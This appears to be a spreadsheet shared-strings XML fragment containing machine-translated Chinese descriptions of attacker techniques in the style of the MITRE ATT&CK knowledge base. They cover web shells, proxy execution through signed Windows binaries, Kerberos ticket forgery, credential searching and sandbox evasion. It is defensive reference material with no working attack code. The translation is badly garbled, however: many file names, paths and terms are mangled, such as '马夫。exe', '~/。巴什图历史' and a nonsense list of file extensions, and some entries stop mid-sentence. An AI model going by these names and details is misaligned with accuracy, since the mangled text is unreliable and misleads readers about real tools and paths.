    <t>攻击者可能会用网络外壳后门网络服务器，以建立对系统的持久访问。Web shell是一个Web脚本，它被放置在一个可公开访问的Web服务器上，以允许攻击者使用该Web服务器作为进入网络的网关。Web shell可以在托管Web服务器的系统上提供一组要执行的功能或命令行界面。</t>
  </si>
  <si>
    <t>攻击者可能会安装在Internet信息服务（IIS）web服务器上运行的恶意组件，以建立持久性。IIS提供了几种机制来扩展web服务器的功能。例如，可以安装Internet服务器应用程序编程接口（ISAPI）扩展和过滤器，以检查和/或修改传入和传出的IIS web请求。扩展和过滤器作为DLL文件部署，导出三个函数：Get{Extension/Filter}Version、Http{Extension/Filter}Proc和（可选）Terminate{Extension/Filter}。还可以安装IIS模块以扩展IIS web服务器。</t>
  </si>
  <si>
    <t>攻击者可能会停止或禁用系统上的服务，以使合法用户无法使用这些服务。停止关键服务或流程可能会抑制或停止对事件的响应，或帮助攻击者实现总体目标，从而对环境造成损害。</t>
  </si>
  <si>
    <t>攻击者可能通过加载共享模块来执行恶意有效负载。可以指示Windows模块加载器从任意本地路径和任意通用命名约定（UNC）网络路径加载DLL。此功能驻留在NTDLL中。dll，是Windows本机API的一部分，它是从Win32 API的CreateProcess、LoadLibrary等函数调用的。</t>
  </si>
  <si>
    <t>攻击者可以通过使用签名二进制文件代理恶意内容的执行，绕过基于进程和/或签名的防御。使用可信数字证书签名的二进制文件可以在受数字签名验证保护的Windows系统上执行。Windows安装中默认的几个Microsoft签名的二进制文件可用于代理其他文件的执行。</t>
  </si>
  <si>
    <t>攻击者可能会滥用已编译的HTML文件（.chm）来隐藏恶意代码。CHM文件通常作为Microsoft HTML帮助系统的一部分分发。CHM文件是各种内容（如HTML文档、图像）和脚本/与web相关的编程语言（如VBA、JScript、Java和ActiveX）的压缩编译。CHM内容使用由HTML帮助可执行程序（hh.exe）加载的Internet Explorer浏览器的底层组件显示。</t>
  </si>
  <si>
    <t>攻击者可能滥用控制权。exe来代理恶意有效载荷的执行。Windows控制面板进程二进制文件（Control.exe）处理控制面板项目的执行，这些项目是允许用户查看和调整计算机设置的实用程序。</t>
  </si>
  <si>
    <t>攻击者可能会滥用CMSTP来代理恶意代码的执行。Microsoft连接管理器配置文件安装程序（CMSTP.exe）是一个用于安装连接管理器服务配置文件的命令行程序。CMSTP。exe接受安装信息文件（INF）作为参数，并安装用于远程访问连接的服务配置文件。</t>
  </si>
  <si>
    <t>攻击者可以使用InstallUtil通过受信任的Windows实用程序代理代码的执行。InstallUtil是一个命令行实用程序，它允许通过执行中指定的特定安装程序组件来安装和卸载资源。NET二进制文件。InstallUtil由Microsoft进行数字签名，位于。Windows系统上的NET目录：C:\Windows\Microsoft。NET\Framework\v\InstallUtil。exe和C:\Windows\Microsoft。NET\Framework64\v\InstallUtil。exe。</t>
  </si>
  <si>
    <t>攻击者可能会滥用mshta。exe来代理恶意代码的执行。hta文件和Javascript或VBScript通过受信任的Windows实用程序。有几个利用mshta的不同类型威胁的例子。在最初的妥协和执行代码</t>
  </si>
  <si>
    <t>攻击者可能会滥用MSExec。exe来代理恶意有效载荷的执行。Msiexec。exe是Windows Installer的命令行实用程序，因此通常与执行安装包（.msi）相关联。Msiexec。exe由Microsoft进行数字签名。</t>
  </si>
  <si>
    <t>攻击者可能会滥用odbcconf。exe来代理恶意有效载荷的执行。Odbcconf。exe是一个Windows实用程序，允许您配置开放数据库连接（ODBC）驱动程序和数据源名称。Odbcconf。exe由Microsoft进行数字签名。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Regsvcs和Regasm，通过受信任的Windows实用程序代理代码执行。Regsvcs和Regasm是用于注册的Windows命令行实用程序。NET组件对象模型（COM）程序集。两者都是微软的数字签名。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Regsvr32。exe来代理恶意代码的执行。Regsvr32。exe是一个命令行程序，用于在Windows系统上注册和注销对象链接和嵌入控件，包括动态链接库（DLL）。Regsvr32。exe也是一个微软签名的二进制文件。</t>
  </si>
  <si>
    <t>攻击者可能会滥用RundL32。exe来代理恶意代码的执行。使用rundll32。exe，即直接执行（即共享模块），可以避免触发可能不监视RundL32执行的安全工具。由于正常操作中的AllowList或误报而导致的exe进程。Rundl32。exe通常与执行DLL有效负载相关联（例如：rundll32.exe{{{DLLname，DLLfunction}）。</t>
  </si>
  <si>
    <t>攻击者可能会滥用verclsid。exe来代理恶意代码的执行。维尔克希德。exe被称为扩展CLSID验证主机，负责在Windows资源管理器或Windows外壳使用每个外壳扩展之前对其进行验证。</t>
  </si>
  <si>
    <t>攻击者可能会滥用权力。exe来代理恶意代码的执行。马夫。exe是Microsoft Application Virtualization Injector，这是一个Windows实用程序，可以将代码作为Microsoft Application Virtualization（App-V）的一部分注入外部进程。</t>
  </si>
  <si>
    <t>攻击者可能会滥用mmc。exe来代理恶意代码的执行。msc文件。微软管理控制台（MicrosoftManagementConsole，简称MMC）是一种经过签名的Windows二进制文件，可以在其GUI或命令提示符中以多种方式使用。MMC可用于创建、打开和保存自定义控制台，这些控制台包含由Microsoft创建的管理工具，称为管理单元。这些管理单元可用于本地或远程管理Windows系统。MMC还可用于打开Microsoft创建的。管理系统配置的msc文件。</t>
  </si>
  <si>
    <t>攻击者可能会使用使用可信证书签名的脚本来代理恶意文件的执行。Windows安装中默认的几个Microsoft签名脚本可用于代理其他文件的执行。攻击者可能会滥用此行为来执行恶意文件，从而绕过系统上的应用程序控制和签名验证。</t>
  </si>
  <si>
    <t>攻击者可以使用PubPrn代理恶意远程文件的执行。PubPrn。vbs是一个将打印机发布到Active Directory域服务的Visual Basic脚本。该脚本由Microsoft签署，通常通过Cscript通过Windows命令Shell执行。exe。例如，以下代码在指定域内发布打印机：cscript pubprn Printer1 LDAP://CN=Container1，DC=Domain1，DC=Com。</t>
  </si>
  <si>
    <t>攻击者可以访问并使用安装在企业网络中的第三方软件套件，如管理、监控和部署系统，在网络中横向移动。第三方应用程序和软件部署系统可能在网络环境中用于管理目的（例如，SCCM、HBSS、Altiris等）。</t>
  </si>
  <si>
    <t>攻击者可能试图获取安装在系统或云环境中的软件和软件版本的列表。攻击者可能会在自动发现过程中使用软件发现的信息来塑造后续行为，包括攻击者是否完全感染目标和/或尝试特定行动。</t>
  </si>
  <si>
    <t>攻击者可能试图获取安装在系统或云环境中的安全软件、配置、防御工具和传感器的列表。这可能包括防火墙规则和反病毒等内容。攻击者可能会在自动发现过程中使用安全软件发现的信息来塑造后续行为，包括攻击者是否完全感染目标和/或尝试特定行动。</t>
  </si>
  <si>
    <t>攻击者可以上传、安装或以其他方式设置可在瞄准过程中使用的功能。为了支持他们的行动，攻击者可能需要获取他们开发（开发能力）或获得（获取能力）的能力，并将其部署在其控制下的基础设施上。这些能力可能部署在攻击者之前购买/租用的基础设施（获取基础设施）上，也可能被攻击者以其他方式破坏（破坏基础设施）。还可以在web服务（如GitHub或Pastebin）上展示这些功能。</t>
  </si>
  <si>
    <t>攻击者可能会将恶意软件上传到第三方或攻击者控制的基础设施，以使其在锁定目标时可访问。恶意软件可能包括有效载荷、Dropper、泄露后工具、后门和各种其他恶意内容。攻击者可能会上传恶意软件以支持其操作，例如将有效负载提供给受害者网络，以便通过将其放置在可访问互联网的web服务器上实现入侵工具传输。</t>
  </si>
  <si>
    <t>攻击者可以安装SSL/TLS证书，以便在目标确定期间使用。SSL/TLS证书是可以安装在服务器上的文件，用于实现系统之间的安全通信。数字证书包括有关密钥的信息、有关其所有者身份的信息，以及已验证证书内容正确的实体的数字签名。如果签名有效，并且检查证书的人信任签名者，那么他们知道可以使用该密钥与证书所有者安全地通信。可以将证书上载到服务器，然后将服务器配置为使用证书来启用与它的加密通信。</t>
  </si>
  <si>
    <t>攻击者可能会准备一个操作环境来感染在正常浏览过程中访问网站的系统。端点系统可能会通过浏览攻击者控制的站点而受到危害，如在“驱动式危害”中。在这种情况下，用户的web浏览器通常是被攻击的目标（登陆网站后通常不需要任何额外的用户交互），但攻击者也可能会为非攻击行为（如应用程序访问令牌）建立网站。在“按需驾驶”妥协之前，攻击者必须提供必要的资源，以便向浏览攻击者控制的网站的用户提供该漏洞。驱动内容可以在攻击者控制的基础设施上进行部署，这些基础设施已被收购（获取基础设施）或之前遭到破坏（破坏基础设施）。</t>
  </si>
  <si>
    <t>攻击者可能会将链接引用的资源放在适当的位置，以便在锁定目标时使用。攻击者可能依靠用户点击恶意链接来泄露信息（包括凭证）或获得执行，如恶意链接。链接可以用于网络钓鱼，比如发送一封带有社会工程文本的电子邮件，诱使用户主动单击或复制URL并将其粘贴到浏览器中。在网络钓鱼获取信息（如网络钓鱼链接）或网络钓鱼获得对系统的初始访问（如网络钓鱼链接）之前，攻击者必须为网络钓鱼链接的链接目标设置资源。</t>
  </si>
  <si>
    <t>攻击者可以窃取用户应用程序访问令牌，作为获取凭据以访问远程系统和资源的手段。这可以通过社会工程实现，通常需要用户操作来授予访问权限。</t>
  </si>
  <si>
    <t>攻击者可能会试图通过窃取或伪造Kerberos票证来破坏Kerberos身份验证，以允许通过票证。Kerberos是现代Windows域环境中广泛使用的身份验证协议。在被称为“领域”的Kerberos环境中，有三个基本参与者：客户机、服务和密钥分发中心（KDC）。客户机请求访问服务，并通过交换来自KDC的Kerberos票证，在成功进行身份验证后被授予访问权限。KDC负责身份验证和票证授予。攻击者可能会试图通过窃取票据或伪造票据来滥用Kerberos，以实现未经授权的访问。</t>
  </si>
  <si>
    <t>拥有KRBTGT帐户密码哈希的攻击者可以伪造Kerberos票证授予票证（TGT），也称为黄金票证。黄金罚单使攻击者能够为Active Directory中的任何帐户生成身份验证材料。</t>
  </si>
  <si>
    <t>拥有目标服务帐户（如SharePoint、MSSQL）密码哈希的攻击者可能伪造Kerberos票证授予服务（TGS）票证，也称为银票证。Kerberos TGS票证也称为服务票证。</t>
  </si>
  <si>
    <t>攻击者可能会滥用有效的Kerberos票证授予票证（TGT）或嗅探网络流量，以获取可能易受暴力攻击的票证授予服务（TGS）票证。</t>
  </si>
  <si>
    <t>攻击者可能会泄露已通过密码破解Kerberos消息禁用Kerberos预身份验证的帐户的凭据。</t>
  </si>
  <si>
    <t>攻击者可以窃取web应用程序或服务会话cookie，并使用它们作为经过身份验证的用户访问web应用程序或Internet服务，而无需凭据。Web应用程序和服务通常在用户对网站进行身份验证后使用会话cookie作为身份验证令牌。</t>
  </si>
  <si>
    <t>攻击者可能会破坏安全控制，这些控制将警告用户不受信任的活动，或阻止执行不受信任的程序。操作系统和安全产品可能包含识别程序或网站是否拥有某种程度信任的机制。此类功能的示例包括：一个程序被允许运行，因为它由有效的代码签名证书签名；一个程序向用户提示警告，因为它具有从Internet下载时设置的属性；或者获得一个指示，表明您将要连接到一个不受信任的站点。</t>
  </si>
  <si>
    <t>攻击者可能会修改表示程序来自不受信任来源的文件属性，以破坏macOS中的网守控制。下载文档、应用程序或程序时，会出现一个名为com的扩展属性（xattr）。苹果隔离可以由执行下载的应用程序在文件上设置。该属性也称为隔离标志，在文件运行时由苹果的Gatekeeper防御程序读取，并向用户提供允许或拒绝执行的提示。Gatekeeper还监视应用程序在任何隔离的二进制文件上使用动态库（dylib）的情况，通常使用dlopen函数。如果在macOS 10.15+中设置了隔离标志，Gatekeeper还会检查公证单，并向苹果的服务器发送加密哈希，以检查所有未签名可执行文件的有效性。</t>
  </si>
  <si>
    <t>攻击者可能会创建、获取或窃取代码签名材料，以对其恶意软件或工具进行签名。代码签名提供了开发人员提供的二进制文件的真实性级别，并保证二进制文件未被篡改。在行动中使用的证书可能会被攻击者创建、获取或窃取。与无效代码签名不同，此活动将生成有效的签名。</t>
  </si>
  <si>
    <t>在进行签名验证检查时，攻击者可能会篡改SIP和信任提供商组件，以误导操作系统和应用程序控制工具。在用户模式下，Windows Authenticode数字签名用于验证文件的来源和完整性，变量可用于建立对签名代码的信任（例如：具有有效Microsoft签名的驱动程序可能会被视为安全的）。签名验证过程通过WinVerifyTrust应用程序编程接口（API）函数进行处理，该函数接受查询，并与负责验证签名参数的适当信任提供者进行协调。</t>
  </si>
  <si>
    <t>攻击者可能会在受损系统上安装根证书，以避免在连接到攻击者控制的web服务器时发出警告。根证书在公钥加密中用于标识根证书颁发机构（CA）。安装根证书后，系统或应用程序将信任根信任链中已由根证书签名的证书。证书通常用于在web浏览器中建立安全的TLS/SSL通信。当用户试图浏览提供不可信证书的网站时，将显示一条错误消息，警告用户存在安全风险。根据安全设置，浏览器可能不允许用户与网站建立连接。</t>
  </si>
  <si>
    <t>攻击者可能会滥用特定的文件格式来破坏网络标记（MOTW）控件。在Windows中，当文件从Internet下载时，它们会被标记为一个名为Zone的隐藏NTFS备用数据流（ADS）。带有一个名为MOTW的特定值的标识符。标记为MOTW的文件受到保护，无法执行某些操作。例如，从MS Office 10开始，如果MS Office文件包含MOTW，它将在受保护视图中打开。带有MOTW标记的可执行文件将由Windows Defender SmartScreen处理，该屏幕会将文件与已知可执行文件的允许列表进行比较。如果文件处于未知/受信任状态，SmartScreen将阻止执行，并警告用户不要运行该文件。</t>
  </si>
  <si>
    <t>攻击者可能会修改代码签名策略，以允许执行未签名或自签名的代码。代码签名为开发人员提供程序的真实性级别，并保证程序未被篡改。安全控制可以包括强制机制，以确保操作系统上只能运行有效的签名代码。</t>
  </si>
  <si>
    <t>在最终消费者收到产品之前，攻击者可能会操纵产品或产品交付机制，以破坏数据或系统。</t>
  </si>
  <si>
    <t>在最终消费者收到软件依赖项和开发工具之前，攻击者可能会出于数据或系统泄露的目的操纵软件依赖项和开发工具。应用程序通常依赖外部软件才能正常运行。在许多应用程序中用作依赖项的流行开源项目可能会成为向依赖项用户添加恶意代码的一种手段。</t>
  </si>
  <si>
    <t>在最终消费者收到应用软件之前，攻击者可能会出于数据或系统泄露的目的操纵应用软件。软件的供应链妥协可能以多种方式发生，包括操纵应用程序源代码、操纵该软件的更新/分发机制，或用修改后的版本替换已编译的版本。</t>
  </si>
  <si>
    <t>在最终消费者收到产品之前，攻击者可能会操纵产品中的硬件组件，以破坏数据或系统。通过修改供应链中的硬件或固件，攻击者可以在消费者网络中插入一个可能难以检测的后门，并让攻击者对系统进行高度控制。硬件后门可以插入各种设备，如服务器、工作站、网络基础设施或外围设备。</t>
  </si>
  <si>
    <t>攻击者可能试图获取有关操作系统和硬件的详细信息，包括版本、补丁、修补程序、服务包和体系结构。在自动发现过程中，攻击者可能会使用系统信息发现中的信息来塑造后续行为，包括攻击者是否完全感染目标和/或尝试特定行动。</t>
  </si>
  <si>
    <t>攻击者可能会收集信息，试图计算受害主机的地理位置。在自动发现过程中，攻击者可能会使用系统位置发现的信息来塑造后续行为，包括攻击者是否完全感染目标和/或尝试特定行动。</t>
  </si>
  <si>
    <t>攻击者可能会试图收集有关受害者系统语言的信息，以推断该主机的地理位置。该信息可用于塑造后续行为，包括攻击者是否感染目标和/或尝试特定行动。恶意软件开发商和运营商可能会利用这一决定来降低其引起特定执法机构注意或其他实体起诉/审查的风险。</t>
  </si>
  <si>
    <t>攻击者可能会通过远程系统的信息发现，查找有关其访问的系统的网络配置和设置的详细信息，如IP和/或MAC地址。有几个操作系统管理实用程序可用于收集这些信息。示例包括Arp、ipconfig/ifconfig、nbtstat和route。</t>
  </si>
  <si>
    <t>攻击者可能会检查受损系统上的互联网连接。这可以在自动发现期间执行，可以通过多种方式完成，例如使用Ping、tracert和获取对网站的请求。</t>
  </si>
  <si>
    <t>攻击者可能会试图通过查询网络上的信息，从当前正在访问的受损系统或远程系统获取网络连接列表。</t>
  </si>
  <si>
    <t>攻击者可能会试图识别主要用户、当前登录用户、通常使用系统的用户集，或者用户是否正在积极使用系统。他们可以这样做，例如，通过检索帐户用户名或使用操作系统凭据转储。可以使用其他发现技术以多种不同的方式收集信息，因为用户和用户名详细信息在整个系统中普遍存在，包括运行进程所有权、文件/目录所有权、会话信息和系统日志。攻击者可以使用该信息</t>
  </si>
  <si>
    <t>攻击者可能会试图获取有关已注册服务的信息。使用操作系统实用程序获取服务信息的命令包括使用tasklist的“sc”、“tasklist/svc”和使用net的“net start”，但攻击者也可能使用其他工具。攻击者可以在自动发现过程中使用系统服务发现的信息来塑造后续行为，包括攻击者是否完全感染目标和/或尝试特定行动。</t>
  </si>
  <si>
    <t>攻击者可能会滥用系统服务或守护进程来执行命令或程序。攻击者可以通过本地或远程与服务交互或创建服务来执行恶意内容。许多服务设置为在引导时运行，这有助于实现持久性（创建或修改系统进程），但攻击者也可以滥用服务来一次性或临时执行。</t>
  </si>
  <si>
    <t>攻击者可能会滥用launchctl来执行命令或程序。Launchctl与macOS的服务管理框架launchd连接。Launchctl支持在命令行上以交互方式执行子命令，甚至从标准输入重定向。</t>
  </si>
  <si>
    <t>攻击者可能会滥用Windows服务控制管理器来执行恶意命令或有效负载。Windows服务控制管理器（services.exe）是管理和操作服务的界面。用户可以通过GUI组件以及系统实用程序（如sc.exe和Net）访问服务控制管理器。</t>
  </si>
  <si>
    <t>攻击者可能会关闭/重新启动系统，以中断对这些系统的访问或协助销毁这些系统。操作系统可能包含启动机器关机/重启的命令。在某些情况下，这些命令还可用于启动远程计算机的关闭/重新启动。关闭或重新启动系统可能会中断合法用户对计算机资源的访问。</t>
  </si>
  <si>
    <t>攻击者可以从本地或远程系统收集系统时间和/或时区。系统时间由Windows time Service在域内设置和存储，以保持企业网络中系统和服务之间的时间同步。</t>
  </si>
  <si>
    <t>攻击者可以通过向共享存储位置（如网络驱动器或内部代码存储库）添加内容，向远程系统交付有效载荷。存储在网络驱动器或其他共享位置的内容可能会因向其他有效文件添加恶意程序、脚本或攻击代码而受到污染。一旦用户打开共享的受污染内容，就可以执行恶意部分，在远程系统上运行攻击者的代码。攻击者可能会使用受污染的共享内容进行横向移动。</t>
  </si>
  <si>
    <t>攻击者可能会在Office文档模板中创建或修改引用，以隐藏恶意代码或强制进行身份验证尝试。微软的Office Open XML（OOXML）规范为Office文档（.docx，xlsx，.pptx）定义了一种基于XML的格式，以取代旧的二进制格式（.doc，.xls，.ppt）。OOXML文件是由各种XML文件（称为部件）打包而成的ZIP文件，其中包含共同定义文档呈现方式的属性。</t>
  </si>
  <si>
    <t>攻击者可能会使用流量信号隐藏开放端口或其他用于持久性或命令和控制的恶意功能。流量信号涉及使用必须发送到系统的魔法值或序列来触发特殊响应，例如打开封闭端口或执行恶意任务。这可能采取的形式是，在打开攻击者可用于指挥和控制的端口之前，发送一系列具有特定特征的数据包。通常，这一系列数据包包括尝试连接到预定义的关闭端口序列（即端口敲门），但可能涉及异常标志、特定字符串或其他独特特征。序列完成后，可以通过基于主机的防火墙打开端口，但也可以通过自定义软件实现。</t>
  </si>
  <si>
    <t>攻击者可以通过将数据（包括云环境的备份）传输到他们在同一服务上控制的另一个云帐户来过滤数据，以避免典型的文件传输/下载和基于网络的过滤检测。</t>
  </si>
  <si>
    <t>攻击者可能会利用受信任的开发人员实用程序来代理恶意有效负载的执行。有许多用于软件开发相关任务的实用程序，可用于以各种形式执行代码，以协助开发、调试和逆向工程。这些实用程序通常可以使用合法的证书进行签名，这些证书允许它们在系统上执行，并通过一个有效地执行PAS的可信进程代理恶意代码的执行</t>
  </si>
  <si>
    <t>攻击者可以使用MSBuild通过受信任的Windows实用程序代理代码的执行。MSBuild。exe（Microsoft Build Engine）是Visual Studio使用的软件构建平台。它处理XML格式的项目文件，这些文件定义了加载和构建各种平台和配置的需求。</t>
  </si>
  <si>
    <t>攻击者可能会破坏或以其他方式利用能够接触目标受害者的组织。通过受信任的第三方关系进行访问时，可能会利用现有的连接，这些连接可能没有受到保护，或者受到的审查比标准的网络访问机制少。</t>
  </si>
  <si>
    <t>攻击者可能会以智能卡等双因素身份验证机制为目标，以获取可用于访问系统、服务和网络资源的凭据。建议使用双因素或多因素身份验证（2FA或MFA），并提供比用户名和密码更高级别的安全性，但组织应了解可用于拦截和绕过这些安全机制的技术。</t>
  </si>
  <si>
    <t>攻击者可能会搜索受损系统，以查找并获取存储不安全的凭据。这些凭证可能存储和/或放错系统上的许多位置，包括明文文件（例如Bash历史）、操作系统或特定于应用程序的存储库（例如注册表中的凭证）或其他专用文件/工件（例如私钥）。</t>
  </si>
  <si>
    <t>攻击者可能会在本地文件系统和远程文件共享中搜索包含不安全存储凭据的文件。这些文件可以是用户创建的用于存储自己凭据的文件、一组个人的共享凭据存储、包含系统或服务密码的配置文件，或者包含嵌入式密码的源代码/二进制文件。</t>
  </si>
  <si>
    <t>攻击者可能会在受损系统的注册表中搜索不安全存储的凭据。Windows注册表存储系统或其他程序可以使用的配置信息。攻击者可能会查询注册表，查找已存储供其他程序或服务使用的凭据和密码。有时这些凭证用于自动登录。</t>
  </si>
  <si>
    <t>攻击者可能会在受损系统上搜索bash命令历史记录，以查找存储不安全的凭据。Bash使用“history”实用程序跟踪用户在命令行上键入的命令。一旦用户注销，历史记录就会刷新到用户的邮箱中。bash_历史文件。对于每个用户，此文件位于相同的位置：~/。巴什图历史。通常，该文件跟踪用户最近的500条命令。用户通常在命令行中键入用户名和密码作为程序的参数，然后在注销时保存到该文件中。攻击者可以通过查看文件中的潜在凭据来滥用此功能。</t>
  </si>
  <si>
    <t>攻击者可能会在受损系统上搜索私钥证书文件，以查找存储不安全的凭据。私钥和证书用于身份验证、加密/解密和数字签名。通用密钥和证书文件扩展名包括：。钥匙pgp。gpg。ppk。第12页。pem。pfx。cer。p7b。asc。</t>
  </si>
  <si>
    <t>攻击者可能试图访问云实例元数据API以收集凭据和其他敏感数据。</t>
  </si>
  <si>
    <t>攻击者可能试图在组策略首选项（GPP）中查找不安全的凭据。GPP是允许管理员使用嵌入凭据创建域策略的工具。这些策略允许管理员设置本地帐户。</t>
  </si>
  <si>
    <t>攻击者可以通过容器环境中的API收集凭据。这些环境中的API，如Docker API和Kubernetes API，允许用户远程管理其容器资源和集群组件。</t>
  </si>
  <si>
    <t>攻击者可能会在未使用的地理服务区域创建云实例，以逃避检测。访问权限通常通过用于管理云基础设施的泄露账户获得。</t>
  </si>
  <si>
    <t>攻击者可以使用备用身份验证材料，例如密码哈希、Kerberos票据和应用程序访问令牌，以便在环境中横向移动并绕过正常的系统访问控制。</t>
  </si>
  <si>
    <t>攻击者可能会使用被盗的应用程序访问令牌绕过典型的身份验证过程，访问远程系统上受限制的帐户、信息或服务。这些令牌通常是从用户那里偷来的，用来代替登录凭据。</t>
  </si>
  <si>
    <t>攻击者可能会使用偷来的密码哈希“传递哈希”，绕过正常的系统访问控制，在环境中横向移动。Pass the hash（PtH）是一种身份验证用户身份的方法，无需访问用户的明文密码。此方法绕过需要明文密码的标准身份验证步骤，直接进入使用密码哈希的身份验证部分。</t>
  </si>
  <si>
    <t>攻击者可能会使用被盗的Kerberos票据在环境中横向移动，绕过正常的系统访问控制，从而“传递票据”。Pass the ticket（PtT）是一种使用Kerberos票据对系统进行身份验证的方法，无需访问帐户密码。Kerberos身份验证可以作为横向移动到远程系统的第一步。</t>
  </si>
  <si>
    <t>攻击者可以使用窃取的会话cookie对web应用程序和服务进行身份验证。这种技术绕过了一些多因素身份验证协议，因为会话已经通过身份验证。</t>
  </si>
  <si>
    <t>攻击者可以依靠用户的特定操作来获得执行。用户可能会受到社会工程的影响，通过打开恶意文档文件或链接等方式执行恶意代码。这些用户行为通常会被视为网络钓鱼形式的后续行为。</t>
  </si>
  <si>
    <t>攻击者可能依靠用户点击恶意链接来获得执行。用户可能会接受社会工程，让他们点击一个链接，这将导致代码执行。这种用户行为通常会被视为网络钓鱼链接的后续行为。单击链接还可能导致其他执行技术，例如利用浏览器漏洞或通过客户端执行漏洞利用应用程序漏洞。链接还可能导致用户下载需要通过恶意文件执行的文件。</t>
  </si>
  <si>
    <t>攻击者可能依赖用户打开恶意文件以获得执行。用户可能会接受社会工程，让他们打开一个文件，从而执行代码。这种用户行为通常会被视为网络钓鱼附件的后续行为。攻击者可能会使用几种需要用户执行的文件，包括。博士。pdf。xls。rtf。scr。exe。lnk。皮夫，还有。下士。</t>
  </si>
  <si>
    <t>攻击者可能依赖运行恶意映像的用户来帮助执行。亚马逊网络服务（AWS）、亚马逊机器映像（AMIs）、谷歌云平台（GCP）映像、Azure映像以及流行的容器运行时（如Docker）都可以被后门访问。后门图像可以通过上传恶意软件上传到公共存储库，然后用户可以从该图像下载并部署实例或容器，而不会意识到该图像是恶意的，从而绕过专门实现初始访问的技术。这可能会导致在实例或容器中执行恶意代码，例如执行加密货币挖掘的代码。</t>
  </si>
  <si>
    <t>攻击者可能会获取并滥用现有帐户的凭据，作为获得初始访问、持久性、权限提升或防御规避的手段。泄露的凭据可用于绕过网络内系统上各种资源上的访问控制，甚至可用于持久访问远程系统和外部可用服务，如VPN、Outlook Web access和远程桌面。泄露的凭证还可能会授予攻击者对特定系统或访问网络受限区域的更高权限。攻击者可能会选择不将恶意软件或工具与这些凭据提供的合法访问权限结合使用，从而更难检测到他们的存在。</t>
  </si>
  <si>
    <t>攻击者可能会获取并滥用默认帐户的凭据，作为获得初始访问、持久性、权限提升或防御规避的手段。默认帐户是内置在操作系统中的帐户，例如Windows系统上的来宾或管理员帐户。默认帐户还包括其他类型系统、软件或设备上的默认工厂/提供商设置帐户，包括AWS中的根用户帐户和Kubernetes中的默认服务帐户。</t>
  </si>
  <si>
    <t>攻击者可能会获取并滥用域帐户的凭据，作为获得初始访问、持久性、权限提升或防御规避的手段。域帐户是由Active Directory域服务管理的帐户，在这些帐户中，访问和权限是跨属于该域的系统和服务配置的。域帐户可以覆盖用户、管理员和服务。</t>
  </si>
  <si>
    <t>攻击者可能会获取并滥用本地帐户的凭据，作为获得初始访问、持久性、权限提升或防御规避的手段。本地帐户是组织为用户、远程支持、服务或单个系统或服务上的管理而配置的帐户。</t>
  </si>
  <si>
    <t>攻击者可能会获取并滥用云帐户的凭据，作为获得初始访问、持久性、权限提升或防御规避的手段。云帐户是由组织创建和配置的，供用户、远程支持、服务使用，或用于管理云服务提供商或SaaS应用程序中的资源。在某些情况下，云帐户可能与传统的身份管理系统（如Windows Active Directory）联合。</t>
  </si>
  <si>
    <t>攻击者可以利用计算机的外围设备（例如，集成摄像头或网络摄像头）或应用程序（例如，视频通话服务）捕获视频记录，以收集信息。还可以从设备或应用程序中捕获图像，可能是在指定的时间间隔内，以代替视频文件。</t>
  </si>
  <si>
    <t>攻击者可能会采用各种手段来检测和避免虚拟化和分析环境。这可能包括根据检查是否存在指示虚拟机环境（VME）或沙箱的工件的结果更改行为。如果攻击者检测到VME，他们可能会改变其恶意软件以脱离受害者或隐藏植入物的核心功能。他们还可以在丢弃次要或额外的有效载荷之前搜索VME工件。在自动发现过程中，攻击者可能会使用从虚拟化/沙盒规避中获得的信息来塑造后续行为。</t>
  </si>
  <si>
    <t>攻击者可能会使用各种系统检查来检测和避免虚拟化和分析环境。这可能包括根据检查是否存在指示虚拟机环境（VME）或沙箱的工件的结果更改行为。如果攻击者检测到VME，他们可能会改变其恶意软件以脱离受害者或隐藏植入物的核心功能。他们还可以在丢弃次要或额外的有效载荷之前搜索VME工件。在自动发现过程中，攻击者可能会使用从虚拟化/沙盒规避中获得的信息来塑造后续行为。</t>
  </si>
  <si>
    <t>攻击者可能会使用各种用户活动检查来检测和避免虚拟化和分析环境。这可能包括根据检查是否存在指示虚拟机环境（VME）或沙箱的工件的结果更改行为。如果攻击者检测到VME，他们可能会改变其恶意软件以脱离受害者或隐藏植入物的核心功能。他们还可以在丢弃次要或额外的有效载荷之前搜索VME工件。在自动发现过程中，攻击者可能会使用从虚拟化/沙盒规避中获得的信息来塑造后续行为。</t>
  </si>
  <si>
    <t>攻击者可能会使用各种基于时间的方法来检测和避免虚拟化和分析环境。这可能包括枚举基于时间的属性，例如正常运行时间或系统时钟，以及使用计时器或其他触发器来避免虚拟机环境（VME）或沙箱，特别是那些自动或仅在有限时间内运行的。</t>
  </si>
  <si>
    <t>攻击者可能会破坏网络设备的加密能力，以绕过本来可以保护数据通信的加密。</t>
  </si>
  <si>
    <t>攻击者可以通过降低加密通信的密码强度来降低解密通过网络传输的数据所需的工作量。</t>
  </si>
  <si>
    <t>攻击者禁用网络设备的专用硬件加密，这可能使他们能够利用软件加密中的弱点，以减少收集、操作和过滤传输数据的工作量。</t>
  </si>
  <si>
    <t>攻击者可以使用现有的合法外部Web服务作为向受损系统转发数据或从受损系统转发数据的手段。作为C2机制的流行网站和社交媒体可能会提供大量的掩护，因为网络中的主机可能已经在妥协之前与它们进行了通信。使用谷歌（Google）或推特（Twitter）等公共服务，让攻击者更容易隐藏在预期的噪音中。Web服务提供商通常使用SSL/TLS加密，为攻击者提供额外的保护级别。</t>
  </si>
  <si>
    <t>攻击者可以使用现有的合法外部Web服务托管指向其他指挥与控制（C2）基础设施的信息。攻击者可能会在带有嵌入式（通常是模糊/编码的）域或IP地址的Web服务上发布内容，称为死区解析程序。一旦感染，受害者会主动联系这些解决者，并被他们重新引导。</t>
  </si>
  <si>
    <t>攻击者可以使用现有的合法外部Web服务作为通过Web服务通道向受损系统发送命令并从中接收输出的手段。受损系统可能会利用流行网站和社交媒体来承载指挥与控制（C2）指令。然后，这些受感染的系统可以通过该Web服务通道将这些命令的输出发送回。返回流量可能以多种方式出现，具体取决于所使用的Web服务。例如，返回流量的形式可能是受损系统在论坛上发布评论、向开发项目发出请求、更新Web服务上托管的文档，或者通过发送推文。</t>
  </si>
  <si>
    <t>攻击者可以使用现有的合法外部Web服务作为向受损系统发送命令的手段，而无需通过Web服务通道接收返回输出。受损系统可能会利用流行网站和社交媒体来承载指挥与控制（C2）指令。这些受感染的系统可能会选择通过不同的C2通道将这些命令的输出发送回，包括发送到另一个不同的Web服务。或者，如果攻击者希望向系统发送指令，而不希望得到响应，则受损系统可能根本不返回任何输出。</t>
  </si>
  <si>
